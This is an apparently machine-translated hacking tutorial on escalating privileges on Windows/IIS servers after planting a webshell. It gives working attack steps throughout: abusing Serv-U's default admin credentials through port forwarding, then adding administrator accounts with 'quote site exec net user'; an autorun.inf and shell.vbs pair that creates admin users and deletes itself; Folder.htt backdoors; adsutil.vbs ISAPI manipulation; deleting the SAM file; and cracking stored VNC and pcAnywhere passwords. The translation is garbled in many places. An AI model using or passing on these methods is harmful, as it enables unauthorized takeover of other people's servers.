Summary of the most comprehensive Webshell elevation Methods

After obtaining a Webshell, If you can use improper system configuration to gain higher permissions, it has always been a hot topic for the masses of black friends, and it is also the biggest difference between the experts and cainiao. This article will summarize all the popular methods of Elevation of Privilege from a large perspective, hoping to inspire everyone and serve as a valuable reference.

WEBSHELL permission improvement skills
C: d: e :.....
C: \ Documents ents and Settings \ All Users \ Start Menu \ Program \
We can see whether the jump can be made. Here we can obtain a lot of useful information, such as the path of Serv-U,
C: \ Documents ents and Settings \ All Users \ Application Data \ Symantec \ pcAnywhere \
Check whether you can jump to this directory. If you want to do this, it is best to directly download its CIF file, crack the pcAnywhere password, and log on to it.
C: \ Program Files \ serv-u \
C: \ WINNT \ system32 \ config \
Run the SAM command to crack the password.
C: \ winnt \ system32 \ inetsrv \ data \
It is completely controlled by erveryone. In many cases, no restrictions are imposed. Upload the tool for permission escalation and execute
C: \ prel
C: \ Program Files \ Java Web Start \
C: \ Documents ents and Settings \
C: \ Documents ents and Settings \ All Users \
C: \ winnt \ system32 \ inetsrv \ data \
C: \ Program Files \
C: \ Program Files \ serv-u \ BBS.bitsCN.com China's earliest Network Management Forum
C: \ Program Files \ Microsoft SQL Server \
C: \ Temp \
C: \ mysql \ (if the server supports PHP)
C: \ PHP (if the server supports PHP)
Run "cscript C: \ Inetpub \ AdminScripts \ adsutil. vbs get w3svc/inprocessisapiapps" to raise the permission
You can also use this code to try to improve it. It seems that it is not ideal.
If the host Settings are abnormal, try writing bat, vbs, and other Trojans in the c: \ Documents ents and Settings \ All Users \ "start" Menu \ Program \ Start.
Hide autorun. inf in the root directory
C: \ program files \ KV2004 \ bind
D: \ program files \ RISING \ RAV \
C: \ Program Files \ Real \ RealServer \
Rar
Folder. htt and desktop. ini
Put the rewritten Folder. htt and desktop. ini, your Trojan, VBS, or something, in the directory that the administrator of the other party may browse.
Replace replacement bundle
Script to write a startup/shutdown script to restart
Delete SAM :( Error
CAcls command
FlashFXP folder Sites. dat Sites. dat. bak Stats. dat Stats. dat. bak
The Ring permission is improved by 21 methods!
The following is a summary of my claim. Many methods have not been tested or succeeded, but I did see that others have succeeded.
. I am not talented, except for the first method I studied, others are summed up by others' experience. Hope to help your friends!

1. radmin connection method
The condition is that you have sufficient permissions and the other party does not even have the firewall. Encapsulate radmin, run, open the Peer Port, and then radmin. I have never succeeded, and the port is opened to the other party.

2. paanywhere
C: \ Documents ents and Settings \ All Users \ Application Data \ Symantec \ pcAnywhere \ His GIF is stored here
File, install pcanywhere locally

3. SAM cracking
C: \ WINNT \ system32 \ config \ under his SAM cracking

4. SU password acquisition
C: \ Documents ents and Settings \ All Users \ Start Menu \ Program \
Reference: Serv-U, and then check the local properties. After you know the path, check whether you can jump
After entering, if you have the permission to modify ServUDaemon. ini and add a user, the password is blank.
[USER = WekweN | 1]
Password =
HomeDir = c :\
TimeOut = 600
Maintenance = System
Access1 = C :\| RWAMELCDP
Access1 = d :\| RWAMELCDP
Access1 = f :\| RWAMELCDP
SKEYvalues =
This user has the highest permission, and then we can go to quote site exec xxx over ftp to improve the permission.

5. c: \ winnt \ system32 \ inetsrv \ data \
Reference: This directory is also fully controlled by erveryone. All we need to do is upload the tool for permission escalation,
Then execute

6. SU overflow Elevation of Privilege
N many online tutorials are not described in detail.

7. Run Csript
Reference: Run "cscript C: \ Inetpub \ AdminScripts \ adsutil. vbs get w3svc/inprocessisapiapps ".
Privilege Escalation
Use this cscript C: \ Inetpub \ AdminScripts \ adsutil. vbs get w3svc/inprocessisapiapps
View the privileged dll file: idq. dll httpext. dll httpodbc. dll ssinc. dll msw3prt. dll
Then add asp. dll to the privileged family.
Asp. dll is stored in c: \ winnt \ system32 \ inetsrv \ asp. dll (the locations of different hosts are not necessarily the same)
We now add cscript adsutil. vbs set/W3SVC/InProcessIsapiApps "C: \ WINNT \ system32 \ idq. dll"
"C: \ WINNT \ system32 \ inetsrv \ httpext. dll" "C: \ WINNT \ system32 \ inetsrv \ httpodbc. dll"
"C: \ WINNT \ system32 \ inetsrv \ ssinc. dll" "C: \ WINNT \ system32 \ msw3prt. dll" "c: \ winnt \ system32
\ Inetsrv \ asp. dll"
You can use cscript adsutil. vbs get/W3SVC/InProcessIsapiApps to check whether it is added.

8. Script elevation
C: \ Documents ents and Settings \ All Users \ Start Menu \ Program \ Start write bat, vbs

9. VNC
This is Xiaohua's article HOHO.
By default, the VNC Password is stored in HKCU \ Software \ ORL \ WinVNC3 \ Password

We can use vncx4
To crack it, vncx4 is easy to use, as long as you enter
C: \> vncx4-W
Then, input the hexadecimal data in sequence. If you do not have to input a carriage return, you can simply enter the hexadecimal data.

10. NC Privilege Escalation
Give the other party an NC, but only if you have enough operation permissions and then bounce it back to your computer. hoho OK.

11. Permission escalation in social engineering
It's easy to look at his support. Generally, after seeing the account, try to guess the password as much as possible. The user password may also be his QQ number.
Check the phone number HOHO as much as possible.

12. Empty IPC connection
If the other party is really an idiot, scan his IPC.

13. replacement service
Don't you need to say that? I personally feel quite complicated.

14. autorun. inf
Autorunw.xxx.exe this = added the read-only, system, and hidden attribute to which disk can be uploaded by yourself.
He does not run

15. desktop. ini and Folder. htt
Reference: First of all, we create a local folder, the name is not important, enter it, right click in the blank space, select "Custom
Folder "xp does not seem to work) always click Next, by default. After that, you will see two more
Setting file holder and desktop. ini file. If you cannot see it, first cancel "hiding the protected operating system file" and then
Find the Folder. htt file in the Folder setting directory, open it in notepad, and add the following code wherever possible: ID = "RUNIT" WIDTH = 0 HEIGHT = 0 TYPE = "application/x-oleobject" CODEBASE = "your backdoor file name">
Then you put your backdoor file under the Folder setting directory and upload the directory together with desktop. ini to the other party.
In any directory, You can execute our backdoor as long as the administrator browses this directory.

16. su overwrite Privilege Escalation
Install a local su and overwrite your own ServUDaemon. ini file with the ServUDaemon. ini file downloaded from it.
Start Serv-U, so all the configurations above are exactly the same as those above.

17. SU forwarding Port
43958 is the local management port of Serv-U. FPIPE.exe upload the file and execute the command: Fpipe-v-l 3333-r.
43958 127.0.0.1 means to map port 4444 to port 43958. Then you can install a Serv-u locally and create
Server, fill in the IP address of the other party, the account is LocalAdministrator, the password is #1 @ $ ak #. 1 k; 0 @ p after the connection, you can manage his
Serv-u now

18. SQL account password Leakage
If you have enabled the MSSQL Server, you can use the SQL connector to add an administrator account to access
ASP file), because MSSQL is the default SYSTEM permission.
Reference: the recipient has not deleted the xp_mongoshell method: Use sqlexec.exe, enter the recipient's IP address in the host column, and download the User and Pass DL.bitsCN.com network management software.
Enter your username and password. Select xp_cmdshell "% s" for format. Click connect.
Enter the CMD command you want in the CMD column.

19. asp. dll
Reference: Because asp. dll is stored in c: \ winnt \ system32 \ inetsrv \ asp. dll (the locations of different hosts are not necessarily the same
)
We now add cscript adsutil. vbs set/W3SVC/InProcessIsapiApps "C: \ WINNT \ system32 \ idq. dll"
"C: \ WINNT \ system32 \ inetsrv \ httpext. dll" "C: \ WINNT \ system32 \ inetsrv \ httpodbc. dll"
"C: \ WINNT \ system32 \ inetsrv \ ssinc. dll" "C: \ WINNT \ system32 \ msw3prt. dll" "c: \ winnt \ system32
\ Inetsrv \ asp. dll"
Now, you can use cscript adsutil. vbs get/W3SVC/InProcessIsapiApps to check whether it is added.
Note: In the usage of get and set, one is to view the setting, and the other is to run the above
C: \ Inetpub \ AdminScripts> under this directory.
If you are an administrator and your machine is used to escalate asp to system permissions, the defense method is
Asp. dll T is a privileged family, that is, the set command is used to overwrite those just now.

20. Magic Winmail
Is there a webshell reference: http://www.eviloctal.com/forum/read.php? Tid = 3587 here

21. DBO ......
In fact, there are a lot of ways to improve the permissions. Let's take a look at how we use HOHO to refresh the server!
Thanks to noangel
WEBSHELL permission Improvement
I believe you have won a lot of bots due to the mobile network upload vulnerability, but they are all webshells and cannot get system permissions. How can you get system permissions? This is what we will discuss this time.
OK, go to my WEBSHELL
Aha, good, Dual CPU, speed should be followed up. How can I be reconciled if I don't win you?
Enter the password and go to it to see if there are any good things. If you flip it down, there seems to be nothing special. Check if you can access other drive letters and click drive C, good, good. You can go in. There is great hope for improvement.

1 serv-u upgrade
OK, look at some programs in his PROGRAME, oh, there is a SERV-U, remember to see the SERV-U has the default user name and password, but the listening port is 43958, it is only accessible locally, but we have port forwarding tools. First look at the version of his SERV-U, telnet XXX. XXX 21
It turns out to be 3.0. Alas, I have to say that this administrator is really incompetent. After scanning, only FTP holes were not supplemented. In this case, we started to escalate permissions.
Upload FPIPE and port forwarding tools, as shown in Figure 3
Run the command d: \ wwwroot \ fpipe.exe-v-l 81-r 43958 127.0.0.1 to forward port 43598 of the Local Machine to port 81.

Then open the SERV-U on our own machine, click Serv-U server, click the server on the menu bar, click New server, then enter the IP, enter the port, remember that the port is the 81 port we just forwarded. The service name is whatever you like. Then the username: LocalAdministrator password: # l @ $ ak #. lk; 0 @ P (the password is a letter)
Click the server you just created. Then you can see the existing user. Create a new user and add all permissions to the user. The root directory is not locked.
The next step is to log on. to log on to FTP, you must log on to CMD,
After entering, the General Command is the same as DOS, when adding a user
Ftp> quote site exec net.exe user hk pass/add
Ftp> quote site exec net.exe localgroup administrators hk/add
If the peer account is 3389, you don't need to teach you how to do it. If you don't, you need to create an IPC connection, upload a trojan or enable the 3389 tool.
II
Auto. ini and SHELL. VBS
Autorun. inf
[Autorun]
Open = shell. vbs
Shell. vbs
Dim wsh
Set wsh = createObject ("WScript. Shell ")
Wsh. run "net user guest/active: yes", 0
Wsh. run "net user guest 520ls", 0
Wsh. run "net localgroup administrators guest/add", 0
Wsh. run "net user hkbme 520ls/add", 0

Wsh. run "net localgroup administrators hkbme/add", 0
Wsh. run "cmd.exe/c del autorun. inf", 0
Wsh. run "cmd.exe/c del shell. vbs", 0

However, you can access the root directory of the other party. Put these two files in the root directory of the hard disk of the other party. Of course, you can also directly execute the trojan program and a trojan program, but the statement is the same as the last two sentences. Run the trojan program through CMD.

3.
Folder. htt and desktop. ini
Put the rewritten Folder. htt and desktop. ini, your Trojan, VBS, or something, in the directory that the other administrator is most likely to browse. I don't think it is enough to put a few more.
Add code to Folder. htt


However, the webshell and the two files must be put in one. This is a bit of a problem. You can start VBS in combination. After the operation is complete, delete the uploaded webshell. That is, CODEBASE = "shell. vbs". shell is written as above.

Thu
Replace
Replace the file being executed. I can get the permission almost immediately with this, but I have not tried it. I can try to replace the file being executed by the other party with the same file name and bind the Trojan. Why not replace the trojan directly? If you replace the key program, isn't it? So we still need to bind the www.bitsCN.net Network Management blog and wait for you to fight
Format
REPLACE [drive1:] [path1] filename [drive2:] [path2] [/A]
[/R] [/W]
REPLACE [drive1:] [path1] filename [drive2:] [path2]
[/R] [/S] [/W]
[Drive1:] [path1] filename specifies the source file.
[Drive2:] [path2] specifies
Directory.
/A adds the new file to the target directory. Cannot match
/S or/U command line switch.
/P will prompt you before replacing the file or adding the source file
Confirm.
/R replace read-only files and unprotected
File.
/S replaces all subdirectories in the target directory.
Cannot match the/A Command Option
.
/W.
/U only replaces or updates files earlier than the source file date.
Cannot be used with/A command line switch
This command has not been tested. Check if you can replace files in inaccessible folders.

V.
Script
Compile a startup/shutdown script configuration file scripts. ini. The file name is fixed and cannot be changed. The content is as follows:
[Startup]

0 rows line = a. bat
0 Parameters =
Save the file scripts. ini to "C: \ winnt \ system32 \ GroupPolicy \ Machine \ Scripts"
A. BAT content can be net user yonghu mima
It can also be net user ADMINistrator XXX
In this way, you can restore the password of any user name you want, or add new users by yourself, but you need to restart the system, and you have the write permission for SYSTEM32.

Sat.
SAM
If you can access the other party's SYSTEM32, delete the other party's SAM file. After restart, the ADMIN user password is blank.
Suddenly I had another idea. Can I use the REPLACE command to REPLACE it? I can extract your SAM file, upload it to any of his directories, and then REPLACE it. However, I don't know if I can replace it if I have no permission to access SYSTEM32.

1. The complete idea of hacker network intrusion into large websites
2. Privilege Escalation after php Injection